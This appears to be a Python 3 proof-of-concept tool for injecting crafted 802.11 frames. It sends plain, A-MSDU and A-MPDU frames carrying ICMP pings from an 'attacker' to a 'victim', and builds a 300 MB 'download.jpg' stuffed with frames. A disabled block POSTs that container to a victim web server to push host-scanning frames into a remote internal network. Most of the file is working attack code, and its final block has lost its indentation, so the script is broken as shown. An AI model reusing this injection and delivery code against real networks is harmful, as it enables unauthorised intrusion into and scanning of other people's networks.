#!/usr/bin/env python3
from rpyutils_python3 import printd, Color, Level, clr, VERBOSITY
from packets_python3 import Dot11Packet, AMPDUPacket, AMSDUPacket, ping_packet, arp_packet, tcp_syn, ssid_packet, probe_response
import requests
import random
import sys
#this is useful to dump packets in hex mode
import hexdump
import time
class MaliciousDownload():
    """Hold the str() form of a packet container and dump it repeatedly to download.jpg."""

    def __init__(self, package):
        # Stored as text; write() emits it through a text-mode file handle.
        self.data = str(package)

    def write(self):
        """Write 10000 copies of the data to download.jpg, each prefixed by 0-3 NUL characters."""
        with open('download.jpg', 'w') as out:
            for _ in range(10000):
                nul_prefix = "\x00" * random.randint(0, 3)
                out.write(nul_prefix + self.data)
def fuzztf(option1, option2):
    """Return option1 or option2 with equal probability (one random.randint(0, 1) draw)."""
    coin = random.randint(0, 1)
    return option1 if coin else option2
"""
def main_download():
# Malicious download
raw_input("This will create a 300 MB file download.jpg in the working directory. Press any key to continue or CTRL+C to exit.")
printd(clr(Color.YELLOW, "Creating malicious download..."), Level.INFO)
container = ""
for i in range(0, 256):
# Containers are (series of) frames to inject into the remote network
# Container for scanning hosts on internal network
#md_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '4C:5E:0C:9E:82:19', '4C:5E:0C:9E:82:19', 0x02)
#md_pkt.add_msdu(ping_packet(i, "10.0.0.1", "192.168.88.249"))
#md_pkt.add_padding(8)
# Container for a Beacon frame
md_pkt = ssid_packet()
container += str(md_pkt)
md = MaliciousDownload(container)
md.write()
"""
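def main():
    """PoC 1: build a plain 802.11 data frame with one ICMP echo MSDU and send it ten times.

    Each iteration creates a fresh Dot11Packet (Radiotap + 802.11 header)
    addressed to the broadcast MAC with the fixed source/BSSID address below,
    hexdumps the Radiotap and 802.11 headers, prints the Radiotap header once
    more as a "\\x.." escaped string, appends a ping_packet MSDU, transmits
    the frame and sleeps 100 ms. The hexdump calls for the MSDU and the full
    frame were commented out in the Python 2 version, so those two headings
    print with nothing beneath them.

    Side effects: stdout output and transmission through Dot11Packet.send()
    (the interface has to be in monitor mode).
    """
    count = 1     # first argument to ping_packet, wraps at 1024 (presumably an ICMP id/seq -- see packets_python3)
    ip_count = 1  # last octet of the destination IP, advanced modulo 255 each frame
    for _ in range(10):
        count = (count + 1) % 1024
        ip_count = (ip_count % 255) + 1
        # Empty frame: Radiotap + dot11 header, broadcast destination, fixed src/BSSID
        pkt = Dot11Packet('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B')
        radiotap = bytes(pkt.rt)
        printd(clr(Color.YELLOW, "Radiotap:"), Level.INFO)
        hexdump.hexdump(radiotap, result='print')
        printd("", Level.INFO)  # linefeed
        # Same header in the "\x00\x00\x12\x00..." form; one print instead of a
        # per-byte ''.join over a single formatted string (a no-op join).
        print(''.join('\\x{:02x}'.format(b) for b in radiotap), end='', flush=True)
        printd("", Level.INFO)  # linefeed
        printd("", Level.INFO)  # linefeed
        printd(clr(Color.YELLOW, "802.11 hdr:"), Level.INFO)
        hexdump.hexdump(bytes(pkt.dot11hdr), result='print')
        sys.stdout.flush()
        # Payload: one ICMP echo MSDU
        pkt.add_msdu(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
        printd(clr(Color.YELLOW, "MSDU added:"), Level.INFO)
        sys.stdout.flush()
        printd(clr(Color.YELLOW, "Radiotap + 802.11 hdr + MSDU + CRC:"), Level.INFO)
        sys.stdout.flush()
        pkt.send()  # the interface has to be in monitor mode
        printd("packet sent", Level.INFO)
        time.sleep(0.1)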
# send packets with a number of MSDU (A-MSDU)
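def main_amsdu():
    """PoC 2: build one A-MSDU frame carrying a single ICMP echo MSDU and transmit it ten times.

    The frame is built once (broadcast destination, fixed source/BSSID
    address, 0x02 as the fourth AMSDUPacket argument) and then sent ten times
    with a 100 ms pause. All hexdump calls from the Python 2 version are
    commented out, so the "AMSDU Radiotap", "AMSDU dot11hdr" and "AMSDU data"
    headings print with nothing beneath them.

    Side effects: stdout output and transmission through AMSDUPacket.send()
    (the interface has to be in monitor mode).
    """
    # Same counter scheme as main(), evaluated once: count -> 2, ip_count -> 1.
    count = 1
    ip_count = 0
    count = (count + 1) % 1024
    ip_count = (ip_count % 255) + 1
    # Ping from attacker --> victim
    # You need to change the MAC addresses and IPs to match the remote AP
    amsdu_pkt = AMSDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B', 0x02)
    printd(clr(Color.YELLOW, "AMSDU Radiotap (rt):"), Level.INFO)
    # Was print("", Level.INFO), which wrote the Level enum itself to stdout;
    # every other linefeed in this file goes through printd.
    printd("", Level.INFO)  # linefeed
    printd(clr(Color.YELLOW, "AMSDU dot11hdr:"), Level.INFO)
    sys.stdout.flush()
    # add an MSDU (first arg presumably an ICMP id/seq -- see packets_python3)
    amsdu_pkt.add_msdu(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
    # Heading previously said "AMPDU"; this PoC builds an A-MSDU.
    printd(clr(Color.YELLOW, "AMSDU with the MSDU added:"), Level.INFO)
    sys.stdout.flush()
    printd(clr(Color.YELLOW, "AMSDU data:"), Level.INFO)
    sys.stdout.flush()
    printd("", Level.INFO)  # linefeed (was print("", Level.INFO))
    # send the packet a number of times
    for _ in range(10):
        amsdu_pkt.send()  # the interface has to be in monitor mode
        printd("AMSDU packet sent", Level.INFO)
        time.sleep(0.1)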
# Connect to victim web server and POST malicious host scanning ICMP frames (push to victim)
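def main_ampdu():
    """PoC 3: build A-MPDU frames carrying one ICMP echo MSDU each and transmit the last one ten times.

    The loop builds two AMPDUPacket frames (broadcast destination, fixed
    source/BSSID address, 0x02 as the fourth argument), each with one
    ping_packet MSDU and eight padding delimiters, and appends str() of each
    to `container`. `container` is only hexdumped; the transmission loop at
    the end sends `ampdu_pkt`, i.e. the frame built in the last iteration.
    The hexdump calls inherited from the Python 2 version are commented out,
    so most headings print with nothing beneath them. The HTTP delivery path
    (POSTing the container with requests) survives only as a dead string
    literal at the end of the function and never runs.

    Side effects: stdout output and transmission through AMPDUPacket.send()
    (the interface has to be in monitor mode).
    """
    count = 1     # first argument to ping_packet, wraps at 1024 (presumably an ICMP id/seq -- see packets_python3)
    ip_count = 0  # last octet of the destination IP, advanced modulo 255 each frame
    printd(clr(Color.BLUE, "Building container..."), Level.INFO)
    # Build container
    container = ''
    for _ in range(2):
        count = (count + 1) % 1024
        ip_count = (ip_count % 255) + 1
        # Ping from attacker --> victim
        # You need to change the MAC addresses and IPs to match the remote AP
        ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B', 0x02)
        printd(clr(Color.YELLOW, "Radiotap (rt):"), Level.INFO)
        # Was print("", Level.INFO), which wrote the Level enum itself to stdout;
        # every other linefeed in this file goes through printd.
        printd("", Level.INFO)  # linefeed
        printd(clr(Color.YELLOW, "dot11hdr:"), Level.INFO)
        sys.stdout.flush()
        # add an MSDU to the AMPDU
        ampdu_pkt.add_msdu(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
        printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO)
        sys.stdout.flush()
        ampdu_pkt.add_padding(8)
        printd(clr(Color.YELLOW, "AMPDU with MSDU and 8 padding delimiters added:"), Level.INFO)
        sys.stdout.flush()
        container += str(ampdu_pkt)
    # end package
    printd(clr(Color.BLUE, "Final A-MPDU built:"), Level.INFO)
    sys.stdout.flush()
    # NOTE(review): container is a str; the hexdump package rejects str on
    # Python 3 (it expects bytes). main() dumps bytes(pkt.rt) -- confirm whether
    # AMPDUPacket supports bytes() and convert here accordingly.
    hexdump.hexdump(container)
    sys.stdout.flush()
    printd("", Level.INFO)  # linefeed (was print("", Level.INFO))
    # send the packet a number of times -- note: only the last frame built above
    for _ in range(10):
        ampdu_pkt.send()  # the interface has to be in monitor mode
        printd("packet sent", Level.INFO)
        time.sleep(0.1)
    # Dead code inherited from the original: HTTP delivery of the container.
    # It is a bare string literal and never executes (`session` is never created).
    """
while 1:
print("."),
sys.stdout.flush()
request_params = {'postpayload': ("\x00" * random.randint(0, 3)) + str(container)}
try:
session.post("http://" + "10.0.0.6:80" + "/index.html", files=request_params, timeout=5)
except requests.exceptions.ConnectionError:
printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL)
pass
except Exception:
printd(clr(Color.RED, "Another exception"), Level.CRITICAL)
pass
"""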
if __name__ == "__main__":
try:
#pocnum = raw_input("option 1: send normal packets. " # this was valid in Python2
# "option 2: send AMSDUs. "
# "option 3: send AMPDUs. "
# "Choice: ")
pocnum = input("option 1: send normal packets. " # this is valid in Python3
"option 2: send AMSDUs. "
"option 3: send AMPDUs. "
"Choice: ")
if pocnum == "1":
main()
elif pocnum == "2":
main_amsdu()
elif pocnum == "3":
main_ampdu()
else:
printd("Invalid PoC number.", Level.CRITICAL)
except KeyboardInterrupt:
printd("\nExiting...", Level.INFO)